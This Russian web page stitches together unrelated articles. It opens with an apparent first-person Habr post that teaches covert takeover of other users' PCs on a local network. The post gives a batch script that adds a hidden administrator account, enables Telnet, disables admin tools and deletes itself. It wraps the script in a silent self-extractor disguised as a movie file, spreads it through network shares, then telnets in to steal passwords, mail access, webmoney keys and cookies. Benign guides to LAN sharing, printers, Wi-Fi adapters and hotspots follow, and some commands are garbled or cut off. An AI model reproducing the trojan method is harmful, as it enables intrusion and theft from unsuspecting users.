Как получить доступ к компьютеру через wifi

Привет всем, это моя первая статья на хабре, так что не судите строго. В этом посте я опишу как можно получить удаленный доступ к компьютеру пользователя в вашей локальной сети через командную строку, обходя все антивирусы и немного зная синтаксис командной строки Windows. Статья предназначена для использования только на Windows XP, но при желании можно переписать код под любую другую ОС семейства Windows. Итак, приступим. В целом, статья написана для пользователей начального уровня. Самая главная цель — это заполучить нужные данные (пароли, явки, дачи, доступ к почтовым ящикам, файлы ключей webmoney, куки и прочая важная перхоть) и уйти незаметно, не оставив следов проникновения. Итак, начнем, я нахожусь в локальной сети имеющей порядка 5000 пользователей, сеть со статикой или dhcp не имеет значения, мне розан ip адрес и я счастлив. В сети имеется тьма подсетей, роуты которых прописаны на серваке. MAC адрес компа прописан у админа сети, так как в моем случае, это было условие подключения к сетке, таким образом мой мак засветится в случае чего. Во избежание быть найденным, первым делом устанавливаем виртуальную машину (использовал VmWare 5.1), устанавливаем на нее XP, сканер портов (использовал SuperScan 3.00 Скачать можно здесь) и запускаем службу Telnet. Подключаем виртуальную машину к сети с помощью NAT и получаем таким образом совершенно другой mac-адрес машины смотрящей в сеть. Все гуд виртуалку поставили, идем дальше. Открываем обычный блокнот и пишем батник следующего содержания:

@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add »HKCUSOFTWAREMicrosoftWindowsCurrentVersionpoliciesSystem» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCUSOFTWAREPOLICIESMicrosoftMMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%system32compmgmt.msc >nul
del Start_game.bat

1. Echo off (думаю всем понятно, объяснять не стоит).

2. Net user Admin_Support lop /add >nul Создаем в системе учетную запись с произвольным логином, в примере: Admin_Support и паролем lop. Учетка появится в списке учетных записей пользователей, можно придумать другое имя, к примеру что-то похожее на SUPPORT_388945a0 (учетная запись поставщика для службы справки и поддержки), на которую большинство пользователей не обращают внимания. Есть 1 нюанс мы создали учетку, но ведь она появится при входе в систему у пользователя, необходимо ее скрыть, об этом будет описано ниже.

3. Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul Добавляем учетку Аdmin_support в группу Администраторы, кодировка слова «Администраторы», как у меня в данном случае «Ђ¤¬Ё­Ёбва в®ал» обязательно должна быть в кодировке DOS. Можно сделать в обычном Far’e. Т.е. то слово у меня уже в кодировке dos.

4. Net accounts /maxpwage:unlimited >nul Период времени в днях, в течение которого будет действовать пароль пользователя. Значение unlimited снимает ограничение по времени. Значение параметра /maxpwage должно быть больше, чем значение параметра /minpwage. Допустимы значения от 1 до 49 710 дней (т. е. значение unlimited равно 49 710 дней), по умолчанию используется значение 90 дней.

5. Sc config TlntSvr start= auto >nul Устанавливаем службу телнет в режим запуска «авто».

6. Sc start TlntSvr >nul Стартуем службу телнет.

7.Reg add “HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList ” /v admin_support /t REG_DWORD /d 0 >null Добавляем ключ в реестр, который скроет нашу учетку в записях в панели управления и при входе в винду (Аутентификации).

8. Reg add “HKCUSOFTWAREMicrosoftWindowsCurrentVersionpoliciesSystem” /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Запрещаем запуск редактирования реестра. (Можно обойтись и без этого параметра).

9. Reg add “HKCUSOFTWAREPOLICIESMicrosoftMMC” /v RestrictPemitSnapins /t REG_DWORD /d 1 /f >nul
del %SestemRoot%system32compmgmt.msc >nul Удаляем mmc (Не обязательный параметр).

10. Reg add “HKCUSOFTWAREPOLICIESMicrosoftwindowsSystem” /v DisableCMD /t REG_DWORD /d 2 /f >nul Запрещаю запуск командной строки. (Не обязательный параметр.)

11. Del Start_game.bat Удаляем сам батник.

Батник готов. Сохраняем содержимое блокнота как .bat файл, под любым именем, в моем случае это Start_game.bat

Далее делаем из bat файла exe файл с помощью обычного winrar’a. В параметрах winrar’a устанавливаем параметр «создать архив sfx» и «выполнить после распаковки файл» батник «Start_game.bat». Также в настройках создания архива указываем: распаковывать в скрытом режиме. Помимо этого добавляем к батнику, с помощью того же winrar’a иконку к файлу. Жмем создать архив и получаем exe-шник с иконкой. Работа с Winrar также показана в видеоуроке ниже.

З.Ы. Конечно же можно использовать и другие программы для создания exe файла, которые имеют различный нужный функционал, такой как задание размера файла, типа, скрытия окна распаковки и прочих интересных вещей. В данном примере для большей наглядности я использовал WinRAR.

(Делать можно необязательно exe файл можно создать и другие типы файлов).

Итак мы получили файл с именем Start_game.exe, также можно создать более оригинальный файл с актуальным именем, чтобы пользователи увидев его в сети захотели его скачать, например название фильма, который недавно вышел или скоро должен выйти и его все ждут, (например Трансформеры-3HDTVRip.avi) ну и так далее.

Далее расшариваем папку в сети с нашим Start_game.exe. Как только наш юзверь скачает и запустит наш Start_game.exe, сработает наш батник, и удалится. Открываем нашу виртуальную машину и запускаем сканер портов, где указываем диапозон сканирования нашей сети (в моем случае это 10.16.93.1-10.16.93.255) и порт телнета (22 или 23). Сканер покажет у какого ip адреса открыт порт телнета. Если порт открыт, смело подключаемся, открываем командную строку и подключаемся командой: telnet ip_адрес, где вводим наш логин admin_support и пароль lop. тем самым получаем доступ к командной строке юзверя, и делаем СВОЁ ДЕЛО! ))) Умея пользоваться командной строкой, можно найти и скопировать любые файлы на компьютере пользователя, скрыто установить практически любое нужное программное обеспечение, и много еще чего интересного. Для более наглядного понимания статьи выкладываю реальный видеоурок со своей сети. Урок довольно старый, так как занимался я этим довольно давно.

При желании батник можно доработать для более интересных нужд, в данной статье показан лишь простой способ доступа к ПК пользователя без его ведома.

З.Ы. Единственный минус батника — cmd.exe висит в процессах у пользователя в диспетчере задач. Но я думаю это не так страшно, так как обычные пользователи не особо заморачиваются в знании имени процесса в диспетчере задач.

Данная статья не подлежит комментированию, поскольку её автор ещё не является полноправным участником сообщества. Вы сможете связаться с автором только после того, как он получит приглашение от кого-либо из участников сообщества. До этого момента его username будет скрыт псевдонимом.

Все о локальных сетях и сетевом оборудовании

Большинство статей нашего сайта посвящено различным способам создания локальной сети. Но, как известно, «Все самое важное – в деталях», и одного только правильного подключения всех сетевых устройств недостаточно для беззаботного существования девайса на просторах домашнего «вайфая».

И в данной статье мы остановимся на том, как подключиться к компьютеру по локальной сети, а также коснемся вопроса, как зайти по сети на подключенный к другому компьютеру принтер.

Итак, чтобы настроить подключение к другому компьютеру через локальную сеть, потребуется, прежде всего, эту самую сеть создать. Сделать это можно как с помощью роутера (домашняя сеть wifi), так и путем жесткого соединения компьютеров посредством сетевого кабеля.

Затем чтобы подключиться к компьютеру по ip адресу «связанные» между собой ПК должны «увидеть» друг друга. Для этого необходимо на каждом компьютере создать правильные настройки сетевой карты и открыть для общего доступа нужные файлы и папки.

Удаленный доступ к компьютеру по локальной сети: настраиваем подключение

1. Зайти на другой компьютер через ip можно только в том случае, если оба ПК находятся в одной и той же рабочей группе.

Для этого на ОС Windows 7 однократно щелкните правой кнопкой мыши по значку «Мой компьютер» (на «Рабочем столе» ПК или в меню «Пуск»)

Далее перейдите во вкладку «Дополнительные параметры системы» и в окне «Свойства системы» откройте раздел «Имя компьютера»

Здесь левой кнопкой мыши кликните кнопку «Изменить» и в графе «Является членом рабочей группы» введите название вашей рабочей группы, после чего нажмите «ОК» во всех открытых окнах.

2. На следующем этапе следует настроить внутренний ip адрес компьютера, который будет использоваться другими ПК для подключения по локальной сети.

Для этого на ОС Windows перейдите в меню «Пуск», далее «Панель управления» -> «Сеть и Интернет» -> «Просмотр состояния сети и задач».

Здесь перейдите во вкладку «Изменение параметров адаптера», найдите ярлык «Подключение по локальной сети», однократно кликните по нему правой кнопкой мыши и выберите раздел меню «Свойства»

В окне «компоненты используются этим подключение» кликните по разделу «Протокол Интернета версии 4». Здесь:

— Чтобы подключиться к другому компьютеру через роутер отметьте маркером «Получать IP-адрес автоматически» и «Получать адрес DNS сервера автоматически».

— Чтобы зайти через сеть на другой компьютер при кабельном соединении ПК (без wifi) отметьте «Использовать следующий IP-адрес» и введите в соответствующих графах следующие данные:

Как через cmd подключиться к другому компьютеру?

На самом деле командная строка поможет вам только пропинговать удаленный компьютер — т.е. с помощью специальной проверить наличие доступа к компьютеру по сети.

Для этого на ОС Windows зайдите в меню «Пуск» -> «Выполнить», в открывшемся системном окне введите команду «cmd» и нажмите клавишу «Enter».

Далее в окне командной строки введите ping ххх.ххх.ххх.ххх (где ххх.ххх.ххх.ххх – статический IP адрес другого компьютера) и нажмите клавишу «Enter».

Если при выполнении команды система выдаст ошибку «Превышен интервал ожидания…» или «Заданный узел недоступен», то доступа к проверяемому компьютеру в сети нет, и вам следует проверить корректность настроек сетевой карты обоих ПК.

Если же пинг проходит без ошибок, то вы сможете подключиться к компьютеру по ip адресу через «Сетевое окружение» на Windows XP и «Центр управления сетями и общим доступом» на Windows 7.

Как подключиться к принтеру по локальной сети?

Чтобы подключиться к принтеру на другом компьютере, прежде всего, необходимо предоставить к нему общий доступ по локальной сети.

Для этого на «обслуживающем» принтер компьютере с ОС Windows 7:

• — зайдите в меню «Пуск» -> «Панель управления» -> «Оборудование и звук» -> «Просмотр устройств и принтеров»;
• — найдите там нужный принтер и однократно кликните по нему правой кнопкой мыши;
• — в контекстном меню во вкладке «Доступ» отметьте маркером «Общий доступ к данному принтеру»;
• — нажмите «Ок» для сохранения новых настроек.

Теперь вы сможете найти принтер в локальной сети любого сетевого компьютера через «Панель управления» -> «Сетевое окружение» на Windows XP и «Центр управления сетями и общим доступом» на Windows 7.

На удаленном компьютере (который подключается к принтеру по локальной сети):

— зайдите в меню «Пуск» -> «Панель управления» -> «Оборудование и звук» -> «Просмотр устройств и принтеров»;

— перейдите в меню «Установка принтера» и следуйте указаниям автоматического мастера настройки сетевого оборудования.

Подключение между двумя компьютерами делается множеством способов. Самый распространенный метод работы в одной локалке – это задействование маршрутизатора. На нем активируется беспроводная точка доступа и с ее помощью подключаются девайсы по Wi-Fi. В локалке они обоюдно обнаруживаемые, и роутер может предоставлять множеству подсоединенных устройств доступ в интернет.

Но это не единственный вариант того, как подключиться к компьютеру через Wi-Fi. Беспроводной адаптер ПК или ноутбука можно тоже сделать точкой доступа Wi-Fi и коннектится к ней различным устройствам.

Что такое беспроводной адаптер?

Начинайте читать следующий блок, если знаете, что это такое. Если не осведомлены, вот краткая справка. Это компактное устройство для приема и передачи радиосигнала. С его помощью можно принимать и отдавать обратную связь в беспроводной Wi-Fi сети.

Разновидностей устройства много, но классифицировать их можно по способу подключения:

Как выбрать адаптер?

Прежде всего ориентируйтесь на задачи, которые преследуете. Скорость обмена данными между ПК через Wi-Fi будет напрямую зависеть от следующих показателей:

1. Версии стандарта Wi-Fi у адаптера.
2. Стандарта мультиплексирования MIMO или SISO.
3. Поддержки работы в диапазоне 5 ГГц.
4. Удалении ПК между собой.
5. Количества и «качества препятствий» между ПК.
6. Характеристик сетевой карты.
7. Характеристик оборудования посредника.
8. Параметров интернета, предоставляемого провайдером.

Сетевые устройства до 2014-15 годов в основном работают на частоте 2.4 ГГц, то есть максимальная скорость будет в пределах 300 Мбит/с. Если же адаптер поддерживает 5 ГГц, то она при двух антеннах повышается к уровню 433 Мбит/с.

Что касается передачи интернета, необходимо, чтобы сетевая карта, к которой подключен LAN или WAN-кабель, работала с обменом данных в пределах до 1 Гбит/с. Также, если провайдер или посредническое оборудование не может поддерживать эту скорость, реальные показатели Wi-Fi будут намного ниже.

Если же с оборудованием все штатно, но скорость падает, убедитесь, что на пути прохождения сигнала нет преград (бетонные стены, металл, зеркало), а диапазон в 2.4 ГГц или 5 ГГц достает до ПК.

Самые ходовые модели с подключением по USB и поддержкой Wi-Fi 5 поколения:

1. TP-LINK Archer T2U Plus.
2. TP-LINK Archer T4U.
3. ASUS USB-AC53 Nano.
4. ASUS USB-AC68.
5. D-Link DWA-182.
6. Tenda U12 AC1300.
7. Edimax EW-7811UTC.

Для внутреннего подключения в системном блоке через PCI-e (тоже 5 поколение):

1. ASUS PCE-AC51.
2. ASUS PCE-AC56.
3. ASUS PCE-AC68.
4. ASUS PCE-AC88.
5. ASUS PCE-AC56 Refurbished.
6. TP-Link DWA-582 Refurbished.

Организуем хот-спот

О том, как соединить 2 ноутбука в сеть, используя соединение «Компьютер-компьютер», рассказывается в следующем видео:

С теорией познакомились, переходим к практике. Чтобы связать два компьютера, оснащенных Wi-Fi-модулями в единую сеть, предусмотрены специальные параметры для ввода в командную строку. А в графическом интерфейсе Windows 10 есть возможность, требующая нажатия нескольких кнопок. Рассмотрим эти два способа.

Через текстовый интерфейс

В ноутбуке с ОС Windows 8.1 или 7, который настраивается на раздачу Wi-Fi, запустите CMD (обязательно через админа). Создание хот-спот осуществите через параметр:

netsh wlan set hostednetwork mode=”allow” ss >

где: SSID – название хот-спот, а key – пароль.

Мобильный хот-спот

Как сделать точку доступа в Windows, подробно рассказывается тут:

На «десятке» активировать точку доступа можно вообще легко. Функция называется «Мобильный хот-спот». Прежде чем подключиться к другому компьютеру или ноутбуку по Wi-Fi, нужно активировать точку доступа. Подробности расскажу тут:

1. Нажмите Win+I и перейдите в «Сеть и Интернет».
2. Опуститесь к разделу «Мобильный хот-спот».
3. Переведите верхний переключатель в ON-состояние для активации.
4. Тут же можно поменять имя точки доступа, пароль, а также указать, делиться ли выходом в глобальную сеть по Wi-Fiили нет.

Как разрешить доступ к интернету через хот-спот?

1. Нажмите Win+R и через команду ncpa.cpl перейдите в сетевые подключения.
2. Выберите подключение, по которому ПК получает доступ к интернету, и перейдите в «Свойства».
3. Идите на вкладку «Доступ».
4. Установите первую и вторую галочки, а в диалоговом меню клацните на сетевое подключение, используемое точкой доступа.
5. Жмите ОК.

Настраиваем сетевой доступ

Штатными средствами подключиться к другому ПК по Wi-Fi и получить доступ к его файлам можно так:

1. Откройте приложение «Выполнить» сочетанием кнопок «Win+R» и исполните exe /name Microsoft.NetworkandSharingCenter.
2. Жмите «Изменить дополнительные параметры общего доступа».
3. Здесь выставите метки напротив каждого пункта, как указано на скриншоте.

Заключение

Соединить два компьютера через Wi-Fi напрямую поможет функция хот-спот. Активировать ее можно в любой Windows, поддерживаемой разработчиками. На «десятке» это сделать проще всего, так как она запрятана в системных настройках. В остальных версиях ее активация делается через текстовый интерфейс ОС.